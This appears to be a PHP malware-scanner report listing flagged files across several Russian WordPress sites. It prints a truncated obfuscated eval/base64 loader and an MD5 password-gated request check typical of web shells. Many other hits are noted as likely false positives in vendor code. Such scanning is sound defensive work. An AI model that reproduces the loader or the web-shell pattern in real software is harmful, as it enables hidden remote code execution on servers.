eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/msk/data/www/intimparni.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 135.64 kB Created: 2020-09-15 19:17:23 Modified: 2021-05-28 20:14:10 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1207 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/msk/data/www/intimparni.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-28 20:14:08 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimparni.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-28 20:14:08 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/msk/data/www/intimparni.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-28 20:14:08 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 14:00:51 Modified: 2021-05-26 08:49:36 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:36 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Warns: 1
| Description | Match |
|---|
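Function system Warning Potentially dangerous function `system` [https://www.php.net/system]. Note: the match below appears to be the English word "system" followed by a parenthesis inside a translatable string (the text ends in `', 'wp-asset-clean-up')`), not a call to PHP's system(); likely a false positive. |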
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 2
| Description | Match |
|---|
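Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]. Note: the matched text below runs from an `array_filter($allPatterns)` call with no callback argument to an `array_key_exists(..., $_GET)` check in a different method, so the rule appears to have matched across unrelated statements; compare with a clean copy of the plugin before treating it as a backdoor. |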
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:46 Modified: 2021-05-26 08:49:37 Warns: 1
| Description | Match |
|---|
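Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]. Note: the match below sits inside a quoted list of what look like JavaScript method names (`'exec(', 'test(', 'toSource(', 'toString('`) assigned to `$propertiesAndMethods`, i.e. string data in the minifier rather than a call to PHP's exec(); likely a false positive. |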
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
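Exploit hacked_by Line: 7576 Dangerous Hacker credits. Note: the match is only the two words `Hacked by`; PHPExcel's upstream sources appear to contain a developer comment starting with those words, so compare line 7576 with a clean vendor copy before treating this as a defacement marker. |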
Hacked by
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 5
| Description | Match |
|---|
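Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]. Note: this hit and the three nano hits that follow are variable-function calls through `$p_options[PCLZIP_CB_*]`, which is the shape of a callback hook; what matters is whether the stored callback can be set from request data, and the matched text alone does not show that. |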
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-01-26 10:55:00 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
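Exploit extract_global Line: 12 Dangerous Code injection: extracting a global request array such as `$_POST` into the local scope lets request parameters create or overwrite variables, which allows remote attackers to inject PHP code on the target machine via an HTTP request |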
extract($_POST)
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Warns: 3
| Description | Match |
|---|
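Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code. Note: the matches on lines 1071-1073 are runs of ascending character codes, which looks more like a lookup table than a hidden string; verify against the upstream TCPDF file. |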
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-01-13 17:39:31 Modified: 2021-05-26 08:49:37 Dangers: 1
| Description | Match |
|---|
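Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval]. Note: `riny` is `eval` under ROT13; a four-letter match can also fall inside unrelated text, so read line 177 in context before acting on this hit. |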
riny
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-30 06:35:35 Modified: 2021-05-26 08:49:37 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-30 06:35:35 Modified: 2021-05-26 08:49:37 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/ufa/data/www/xn----otbahsfhjjbaleo9h.xn--p1ai/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-30 06:35:36 Modified: 2021-05-26 08:49:37 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/spb/data/www/parnispb.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 135.64 kB Created: 2020-09-15 19:17:23 Modified: 2021-05-22 17:55:20 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1207 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/spb/data/www/parnispb.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-22 17:55:20 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/parnispb.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-22 17:55:20 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/spb/data/www/parnispb.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-26 22:26:54 Modified: 2021-05-22 17:55:20 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/spb/data/www/xn----btbtajwgfdlehbao.xn--p1ai/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2021-06-25 13:23:25 Modified: 2021-06-25 13:23:25 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
